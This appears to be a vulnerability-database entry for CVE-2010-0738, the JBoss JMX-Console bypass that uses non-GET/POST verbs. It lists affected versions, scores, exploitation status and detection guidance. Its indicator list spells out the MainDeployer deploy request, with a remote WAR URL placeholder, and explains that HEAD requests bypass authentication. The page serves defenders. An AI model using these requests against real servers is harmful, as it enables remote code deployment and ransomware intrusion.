cbcvebase.
CVE-2010-0738
published 2010-04-28

CVE-2010-0738: The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before…

PriorityP183medium5.3CVSS 3.1
AVNACLPRNUINSUCNILAN
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-06-15
Exploited in the wild
EPSS
79.42%
99.6th percentile
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.

Affected

17 ranges
VendorProductVersion rangeFixed in
hpprocurve_manager
hpprocurve_manager
redhatjboss_enterprise_application_platform<= 5.1.1
redhatjboss_enterprise_application_platform
redhatjboss_enterprise_application_platform
redhatjboss_enterprise_application_platform
redhatjboss_enterprise_application_platform
redhatjboss_enterprise_application_platform
redhatjboss_enterprise_brms_platform<= 5.2.0
redhatjboss_enterprise_portal_platform<= 4.3.0
redhatjboss_enterprise_soa_platform<= 5.1.1
redhatjboss_enterprise_soa_platform
redhatjboss_enterprise_soa_platform
redhatjboss_enterprise_soa_platform
redhatjboss_enterprise_soa_platform
redhatjboss_enterprise_soa_platform
redhatjboss_enterprise_soa_platform

Detection & IOCsextracted from sources · hover to see the quote

port8080
path/jmx-console
path/jmx-console/HtmlAdaptor
path/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
commandaction=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>
  • CVE-2010-0738 is exploited by sending HTTP requests using a verb other than GET or POST (e.g., HEAD) to bypass JBoss JMX Console authentication; detect non-standard HTTP verbs targeting /jmx-console/HtmlAdaptor
  • The exploit uses a HEAD (or other non-standard) HTTP verb against /jmx-console/HtmlAdaptor to bypass access controls; alert on HTTP methods other than GET/POST to this URI
  • The servlets invoked by httpha-invoker perform access control only for GET and POST methods; monitor for non-GET/POST HTTP requests to JBoss invoker/console endpoints as an authentication bypass indicator
  • CVE-2010-0738 was actively exploited by SamSam ransomware actors targeting unpatched JBoss servers; correlate JBoss exploitation attempts with subsequent ransomware staging activity
  • The exploit deploys a WAR archive via jboss.system:service=MainDeployer; monitor for unexpected WAR deployments or HTTP requests containing 'MainDeployer' and 'deploy' parameters on JBoss servers
  • Detect platform fingerprinting attempts against JBoss by monitoring requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
  • ·The VERB option in the Metasploit module defaults to POST, but the CVE-2010-0738 bypass specifically requires a verb other than GET or POST (e.g., HEAD); the module logic forces HEAD when a non-GET/POST verb is configured
  • ·The MainDeployer-based WAR upload method requires the target JBoss server to be able to make outbound connections back to the attacker's HTTP server to fetch the WAR payload
  • ·CVE-2011-4085 is explicitly noted as a regression of CVE-2010-0738, meaning patching CVE-2010-0738 alone may not be sufficient if the regression is present in affected JBoss platform versions

CVSS provenance

nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.3MEDIUM
cisa5.3MEDIUM
vendor_redhat5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.